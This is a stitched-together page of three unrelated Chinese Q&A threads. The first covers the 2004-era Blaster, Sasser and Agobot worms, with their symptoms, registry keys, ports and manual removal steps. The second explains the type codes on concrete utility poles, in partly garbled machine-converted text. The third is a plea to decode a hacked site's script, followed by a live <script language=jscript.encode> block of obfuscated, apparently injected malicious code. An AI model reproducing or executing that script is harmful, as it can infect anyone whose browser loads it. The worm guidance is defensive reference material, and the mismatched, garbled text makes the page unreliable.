❶ 為什麼我的電腦會突然之間變成藍屏,上面會有一串英文和數字,要重起電腦後才會好~~大家如果知道請告訴我
很不幸,您中了沖擊波或震盪波病毒!
沖擊波病毒感染症狀
1、莫名其妙的藍屏死機或重新啟動計算機;
2、IE瀏覽器不能正常地打開鏈接;
3、不能復制粘貼;
4、有時出現應用程序,比如Word異常;
5、網路變慢;
6、最重要的是,在任務管理器里有一個叫「msblast.exe」的進程在運行!
7.SVCHOST.EXE產生錯誤會被WINDOWS關閉,您需要重新啟動程序
8、在WINNT\\SYSTEM32\\WINS\\下有DLLhost.exe和svchost.exe
檢測你的計算機是否被"沖擊波殺手"病毒感染:
1)檢查系統的system32\\Wins目錄下是否存在DLLHOST.EXE文件(大小為20K)和SVCHOST.EXE文件,(注意:系統目錄里也有一個DLLHOST.EXE文件,但它是正常文件,大小隻有8KB左右)如果存在這兩個文件說明你的計算機已經感染了"沖擊波殺手"病毒;
2) 在任務管理器中查看是否有三個或三個以上DLLHOST.EXE的進程,如果有此進程說明你的計算機已經感染了此病毒。
解決方法:
第一步:終止惡意程序
打開Windows任務管理器,按CTRL+ALT+DELETE然後單擊進程選項卡 ,在運行的程序清單中*, 查找如下進程:MSBLAST.EXE DLLhost.exe和svchost.exe
選擇惡意程序進程,然後按「終止任務」或是「中止進程」按鈕。
為確認惡意程序進程是否中止,請關閉任務管理器並再次打開看進程是否已經終止。
第二步:刪除注冊表中的自啟動項目
刪除注冊表中的自啟動項目可以阻止惡意程序在系統啟動時運行
注冊表管理器 ,
HKEY_LOCAL_MACHINE>Software>Microsoft>Windows>CurrentVersion>Run
在右邊的列表中查找並刪除以下項目
Windows auto update" = MSBLAST.EXE DLLhost.exe和svchost.exe
重啟系統
第三步:安裝微軟提供的沖擊波補丁
Microsoft Security Bulletin MS03-026
點這里下載Win2000簡體中文版沖擊波補丁
點這里下載WinXP簡體中文版沖擊波補丁
點這里下載Win2000英文版沖擊波補丁
點這里下載WinXP英文版沖擊波補丁
裝WIN2000系統的機器不論是伺服器版還是個人版的都要順序打上從SP2到Sp4
更改計算機系統時間到2004年後,重啟計算機。這時病毒將自動清除自己,檢查一下是否還有病毒;
瑞星專殺「沖擊波」專殺工具
點擊這里下載瑞星沖擊波專殺工具1.9
點擊這里下載金山毒霸沖擊波專殺工具1.9
___________________________________________________________________
我怎麼知道我是不是已經打上了這個補丁?
根據微軟的定義,這個安全修補程序的代號為kb823980,我們要檢查的就是這一項。
打開注冊表編輯器。不知道怎麼打開?在開始菜單上執行「運行」命令,輸入「regedit"(不要引號)。
在注冊表編輯器的窗口裡又分左右兩個窗格,我們先看左窗格。這個東西和資源管理器是非常相像的,只不過它有一些類似HKEY_。。。這樣的條目,我們只看HKEY_LOCAL_MACHINE這一條(這裡面的東東實在太多了,就不羅索了)。
展開這一條,找到裡面的SOFTWARE,然後再展開,找到Microsoft,依次分別:
1、對於WindowsNT4.0: 找到 Updates,Windows NT, SP6,看看裡面有沒有kb823980
2、對於Windows2000: 找到 Updates,Windows 2000,SP5,看看裡面有沒有kb823980
3、對於WindowsXP: 找到 Updates,Windows XP, SP1,看看裡面有沒有kb823980 4、對於WindowsXP SP1:找到 Updates,Windows XP, SP2,看看裡面有沒有kb823980,如果找到,那就說明已經打上補丁了。如果沒有,那就只有再來一次啦。
--------------------------------------------------------------------------------
-- 作者:白鯊笑江湖
-- 發布時間:2004-9-1 17:58:48
--
「震盪波」病毒
根據分析,「震盪波」病毒會在網路上自動搜索系統有漏洞的電腦,並直接引導這些電腦下載病毒文件並執行,因此整個傳播和發作過程不需要人為干預。只要這些用戶的電腦沒有安裝補丁程序並接入互聯網,就有可能被感染。
「震盪波」病毒的發作特點,類似於去年夏天造成大規模電腦系統癱瘓的「沖擊波」病毒,那就是造成電腦反復重啟。
瑞星反病毒專家介紹,該病毒會通過ftp 的5554埠攻擊電腦,使系統文件崩潰,造成電腦反復重啟。病毒如果攻擊成功,會在c:\\windows目錄下產生名為avserve.exe的病毒體,用戶可以通過查找該病毒文件來判斷是否中毒。
「震盪波」病毒會隨機掃描ip地址,對存在有漏洞的計算機進行攻擊,並會打開ftp的5554埠,用來上傳病毒文件,該病毒還會在注冊表hkey_local_machine\\software\\microsoft\\windows\\currentversion\\run中建立:"avserve.exe"=%windows%\\avserve.exe的病毒鍵值進行自啟動。
該病毒會使「安全認證子系統」進程━━lsass.exe崩潰,出現系統反復重啟的現象,並且使跟安全認證有關的程序出現嚴重運行錯誤。
----------------------------------
主要症狀:
1、出現系統錯誤對話框
被攻擊的用戶,如果病毒攻擊失敗,則用戶的電腦會出現 LSA Shell 服務異常框,接著出現一分鍾後重啟計算機的「系統關機」框。
2、系統日誌中出現相應記錄
如果用戶無法確定自己的電腦是否出現過上述的異常框或系統重啟提示,還可以通過查看系統日誌的辦法確定是否中毒。方法是,運行事件查看器程序,查看其中系統日誌,如果出現如下圖所示的日誌記錄,則證明已經中毒。
3、系統資源被大量佔用
病毒如果攻擊成功,則會佔用大量系統資源,使CPU佔用率達到100%,出現電腦運行異常緩慢的現象。
4、內存中出現名為 avserve 的進程
病毒如果攻擊成功,會在內存中產生名為 avserve.exe 的進程,用戶可以用Ctrl+Shift+Esc 的方式調用「任務管理器」,然後查看是內存里是否存在上述病毒進程。
5、系統目錄中出現名為 avserve.exe 的病毒文件
病毒如果攻擊成功,會在系統安裝目錄(默認為 C:\\WINNT )下產生一個名為avserve.exe 的病毒文件。
6、注冊表中出現病毒鍵值
病毒如果攻擊成功,會在注冊表的 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run 項中建立病毒鍵值: "avserve.exe "="%WINDOWS%\\avserve.exe " 。
---------------------------------
如何防範「震盪波」
首先,用戶必須迅速下載微軟補丁程序,對於該病毒的防範,。
點這里下載微軟補丁
金山或者瑞星用戶迅速升級殺毒軟體到最新版本,然後打開個人防火牆,將安全等級設置為中、高級,封堵病毒對該埠的攻擊。
非金山或者瑞星用戶迅速下載免費的專殺工具:
點這里下載
如果用戶已經被該病毒感染,首先應該立刻斷網,手工刪除該病毒文件,然後上網下載補丁程序,並升級殺毒軟體或者下載專殺工具。手工刪除方法:查找該目錄c:\\windows目錄下產生名為avserve.exe的病毒文件,將其刪除。
點這里下載2000補丁程序
點這里下載xp補丁程序
-------------------------
「震盪波」病毒解決其他:
A、請升級毒霸到5月1日的病毒庫可完全處理該病毒;
B、請到以下網址即時升級您的操作系統,免受攻擊
點這里下載
C、請打開個人防火牆屏蔽埠:5554和1068,防止名為avserve.exe的程序訪問網路
D、如果已經中招,請下載專殺工具進行殺毒處理,點這里下載;或者採用手工方式解決:
對於系統是Windows9x/WinMe:
步驟一,刪除病毒主程序
請使用干凈的系統軟盤引導系統到純DOS模式,然後轉到系統目錄(默認的系統目錄為 C:\\windows),分別輸入以下命令,以便刪除病毒程序:
C:\\windows\\system32\\>del *_up.exe
C:\\windows\\system32\\>cd..
C:\\windows\\>del avserve.exe
完畢後,取出系統軟盤,重新引導到Windows系統。
如果手中沒有系統軟體盤,可以在引導系統時按「F5」鍵也可進入純DOS模式。
步驟二,清除病毒在注冊表裡添加的項
打開注冊表編輯器: 點擊開始>運行, 輸入REGEDIT, 按Enter;
在左邊的面板中, 雙擊(按箭頭順序查找,找到後雙擊):
HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
在右邊的面板中, 找到並刪除如下項目:
"avserve.exe" = %SystemRoot%\\avserve.exe
關閉注冊表編輯器.
對於系統是Windows NT, Windows 2000, Windows XP, Windows 2003 Sever:
步驟一,使用進程序管里器結束病毒進程
右鍵單擊任務欄,彈出菜單,選擇「任務管理器」,調出「Windows任務管理器」窗口。在任務管理器中,單擊「進程」標簽,在例表欄內找到病毒進程「avserve.exe」,單擊「結束進程按鈕」,點擊「是」,結束病毒進程,然後關閉「Windows任務管理器」;
步驟二,查找並刪除病毒程序
通過「我的電腦」或「資源管理器」進入系統安裝目錄(Winnt或windows),找到文件「avserve.exe」,將它刪除;然後進入系統目錄(Winnt\\system32或windows\\system32),找到文件"*_up.exe", 將它們刪除;
步驟三,清除病毒在注冊表裡添加的項
打開注冊表編輯器: 點擊開始>運行, 輸入REGEDIT, 按Enter;
在左邊的面板中, 雙擊(按箭頭順序查找,找到後雙擊):
HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
在右邊的面板中, 找到並刪除如下項目:
"avserve.exe" = %SystemRoot%\\avserve.exe
關閉注冊表編輯器.
--------------------------------------------------------------------------------
-- 作者:白鯊笑江湖
-- 發布時間:2004-9-1 17:59:55
--
反病毒監測網國內率先截獲了在網路中瘋狂傳播的「高波」病毒最新變種:「高波變種3T」(Worm.Agobot.3.T)。該蠕蟲病毒不但利用了「沖擊波」曾利用過的RPC漏洞,還使用了另外幾個不為常知的漏洞,對區域網中的計算機進行多種攻擊,破壞性要比「沖擊波」病毒更為厲害。
據反病毒工程師介紹說,該病毒變種極多,目前已經有幾十個病毒變種,但該變種是最厲害的一個,病毒運行時會掃描網路,對存在漏洞的計算機進行攻擊,攻擊成功後病毒還會利用大型密碼字典來猜測計算機中密碼,感染區域網,導致整個區域網絡癱瘓。
據分析,該病毒發作時會對用戶計算機帶來以下影響:無法正常使用OFFICE軟體,無法進行復制、粘貼,注冊表無法使用,系統文件無法正常顯示,CPU佔用率達到100%、使用戶計算機反應速度變慢。如果用戶發現自己的計算機出現以上現象,則很有可能是中了該病毒,這時應該立刻斷網、打補丁、殺毒,消除病毒造成的破壞。
病毒名稱: Hack.Agobot3.aw
中文名稱: 安哥[金山]
威脅級別: 3A
病毒別名:「高波變種3T」(Worm.Agobot.3.t) [瑞星]
Backdoor.Agobot.03.aw [AVP]
病毒類型: 黑客、蠕蟲
受影響系統: WinNT/Win2K/WinXP/Win2003
該病毒兼具黑客和蠕蟲的功能,利用IRC軟體開啟後門,等待黑客控制。使用RPC漏洞和WebDAV漏洞進行高速傳播。猜測弱口令重點攻擊區域網,造成區域網癱瘓。
金山毒霸已於11月27日進行了應急處理,並在當天升級了病毒庫。升級到11月27日的病毒庫可完全處理該病毒及其變種。
技術細節
1、利用利用RPC DCOM漏洞和WebDAV漏洞在網路中高速傳播;
2、使用內部包含的超大型「密碼表」猜口令的方式攻擊區域網中的計算機,感染整個區域網,造成網路癱瘓;
3、系統修改:
A.將自身復制為%System%\\scvhost.exe.
B.在注冊表的主鍵:
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
中添加如下鍵值:
"servicehost"="Scvhost.exe"
C.在注冊表的主鍵:
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicces
中添加如下鍵值:
"servicehost"="Scvhost.exe"
4、中止許多知名反病毒軟體和網路安全軟體;
5、利用IRC軟體開啟後門;
6、試圖偷取被感染計算機內的正版軟體序列號等重要信息;
7、該病毒可造成計算機不穩定,出現計算機運行速度和網路傳輸速度極劇下降,復制、粘貼等系統功能不可用,OFFICE和IE瀏覽器軟體異常等現象。
解決方案
A、升級殺毒軟體或下載「安哥」專殺工具
點擊這里下載瑞星高波專殺工具1.9
點擊這里下載毒霸高波專殺工具
B、為系統打上MS03-026 RPC DCOM漏洞補丁(823980) 和MS03-007 WebDAV漏洞補丁(815021),並為系統管理員帳號設置一個更為強壯的密碼。
MS03-026 RPC DCOM漏洞補丁(823980)下載地址
MS03-007 WebDAV漏洞補丁(815021)下載地址
C、手工清除
打開進程管理器,找到名為"scvhost.exe"的進程,並將其結束;在注冊表中的項:HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
下刪除如下鍵值:
"servicehost"="Scvhost.exe"
在注冊表中的項:
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices
下刪除如下鍵值:
"servicehost"="Scvhost.exe"
刪除以下文件:
%System%\\scvhost.exe
專家提醒:
1、請及時升級您的殺毒軟體到最新。因為病毒隨時在產生,
2、打開網路和病毒防火牆,為您的系統打上微軟的最新補丁。殺病毒不如防病毒,只要防止住病毒進入的通道,就可徹底免除病毒帶來的危害;
3、不隨意打開陌生人的郵件。當今的病毒不再只是通過計算機來傳播,病毒製作者會利用人們好奇的心理來騙取自己激活的機會,
http://www.shineblog.com/user1/3584/archives/2004/99146.shtml
參考資料:http://www.bt2005.com/33/2861.asp
❷ 電桿ZS4-18、ZS2-18、ZS4-21、NS2-18、NS4-21、js4-21、DS4-18、NS4-18中的Z、S和後面的數字代表什麼
郭敦顒轉答:
水泥製品廠出品的水泥電桿 型號為DZ21 DZJ21 DZF42等編號代表什麼意思?
| 2010-12-30 17:03
提問者: zzc881121 | 瀏覽次數:2823次
問題補充:
電網工程設計說明裡面的水泥電桿桿型DZ21是什麼意思?
我來幫他解答
| 2011-1-6 11:25
滿意回答
桿塔型號及桿段編號代表的意義 一、桿塔型號 在送電線路中,用漢語拼音字母及數字代號來表示桿塔型號. 1.各種代號的意義 (1)表示桿塔用處分類的代號 Z——直線桿塔 ZJ——直線轉角桿塔 N——耐張桿塔 J——轉角桿塔 D——終端桿塔 F——分支桿塔 K——逾越桿塔 H——換位桿塔 (2)表示桿塔外形或導線、避雷線布置型式的代號 S——上字型 C——叉骨型 M——貓頭型 Yu——魚叉型 V——V字型 J——三角型 G——干字型 Y——羊角型 Q——橋型 B——酒杯型 Me——門型 Gu——鼓型 Sz——正傘型 SD——倒傘型T——田字型 W——王字型 A——A字型 (3)表示桿塔的塔材和構造(即品種)的代號 G——鋼筋混凝土桿 T——自立式鐵塔 X——拉線式鐵塔(不帶X者為無拉線) (4)表示桿塔組立方式的代號 L——拉線式 自立式可不表示。 (5)表示分級的代號 同一種塔型要按荷重停止分級,其分級代號用角注數字1、2、3……表示. (6)表示高度的代號 桿塔的高度是指下橫擔對地的間隔(米),即稱謂高,用數字表示。 2.工程中桿塔型號的表示辦法 (1)鐵塔型號的表示辦法 鐵塔的型號由以下六個局部組成,線路電壓代號(千伏) 用處代 號 型式代號 品種代號 高度(米) 分級 示例:220ZBT1-33表示220千伏直線酒杯型鐵塔,第一級,稱謂高33米。 注 同一條線路,其電壓等級的代號可不表示。 鋼筋混凝土桿型號,與鐵塔型號表示辦法相同,通常不寫出線路電壓的代號。 示例,NMeG2—21表示無拉線耐張門型混凝土桿,第二級,稱謂高21米。 二、桿段的編號 1.桿段的編號辦法如下桿 型 直徑 長 度 規范彎距/桿段類型 接頭類型 2.桿段鐵件的編號直 徑 類 型 闡明:(1)拔梢桿編號時,直徑用梢徑。 (2)桿型的代表符號:B——拔梢桿,D——等徑桿。 (3)計量單位:長度用米表示,直徑用厘米表示,規范彎矩用噸*米表示。 (4)關於桿段的接頭類型及桿段鐵件的類型,目前常用的有兩類,即:鋼板圈(用1表示)和法蘭盤(用2表示)。
9
| 評論
向TA求助
回答者: jierweb | 八級採納率:22%
擅長領域: 互聯網 軟體共享 資源共享 電子數碼
點擊下網頁有更多資料
http://..com/question/211102886.html
❸ 網站被掛馬請解密
<script language=jscript.encode>#@~^AwUAAA==@#@&NG1Es+xDRS.kD+cJ@!/^.r_Jb2Y,Vl L;lT+{BB?^.bwORAUmKNnv@*a@$=?9h}bz){',n:p/_i5"jf(rQ\~@$ZH(--?[fo.QXB13JlkZp'aFXxB@$C-eb@$:@$L,MhZ=xif"4cD93m~@$"]4'wU05u.3 BjM1fDs\^]qWgVWWr*_Zk1.9h?V_bjqjU2x@$e@$Z0792|-Mlehr.l_X9GU(I[aVFV_qG4 I.@$CZ.(l/ts S4,B.l=u5;,+e3s5`$;%Zg,rhP3Y6;Qe9&Z70t^dZ-5.fjQh %HXB}eK"Sd3qs.0//)h`gQ[7q?tnaB:K}ZPeD(V%V4Zd^ RSFq/q\6M/GhkhdBaV7Ml:=Z v $/fs|d\vxbg&7)\Mk/#Mt:l/P7.6ZhV/FGBAK}uKet2aVd4=:ls-c|}e|=7% 6M/khG/ABb:dD=h)s /ad/Q&.HQa9\B&Z?0);t:P%KCD8B3}xws#():4su07iv3KMk^7.)hl^u[DHg:n1UvA;_B(^7.)sl;:j01}c 7(u2Z%34:=:`O/3KWe 7Kks#.ts)^u6(CQEX(@$e"3sH$}~D 9@$C@$Zz8 ~&$M Gnzc7PBcIf+'.[h]s.3ks/;IFX'VdZPu3Bn9"SQv5/Cr.1s{^N: .m5@$e@$ZxNhtA5\4S5@$M@$e9HD'-@$M7ek@$:@$L1|s3d_ir"?9Deg#\@$"OV-'~[e_._`3z315Wb3eP&c3DWWr*Q"&$8zS//u*jiUwx@$e@$Z&FGA2A8 eSIyAQE3r/veB~VGs_8R.hGB@$esk34Z/^:S8$EDlts%o~6(_w5 R;%egz~-P7I'%pZMk/.(lZ4:`e(r.ghq7!RE.e}Z:/K2w^/0dZ=:`$ 3h kMHha9\K}ePt9aVj4l:4s-cJ:n#Mc BdSW/Adxw//0d^/sscVR,3RsF/qHv22_+-2QDb/.(t:=/k.(62F 7!9P9P""ZK:Drs%D)hl^u0MI9q/hV.VR xWkAWkhBq;7Vl;t:P/6:/QJ. _P9eDr:dVkV4V-*Sy4hvMK92sj44Z=hP4hV6X2}xq^?D=:lZs3Vz 7|gUBM; x(h.()^/su)VO5*BHMK&:#VkZ)h`DQ.SD9E_Z&VkD/^t^krolQ63w@$Z.N7t$p~4 G@$M@$e3sH${3VmrK3G?BMY66m#yB/":#3k/4V^sd.D6qPg&2hf"h/B6Uo5yu/G^N:t.C5@$e@$""3h$2A\DS9@$C@$Z"O3O@$MAarM2L~b){'%aU@$@!JdmMJQJbwO@*r#i@#@&RJsBAA==^#~@</script>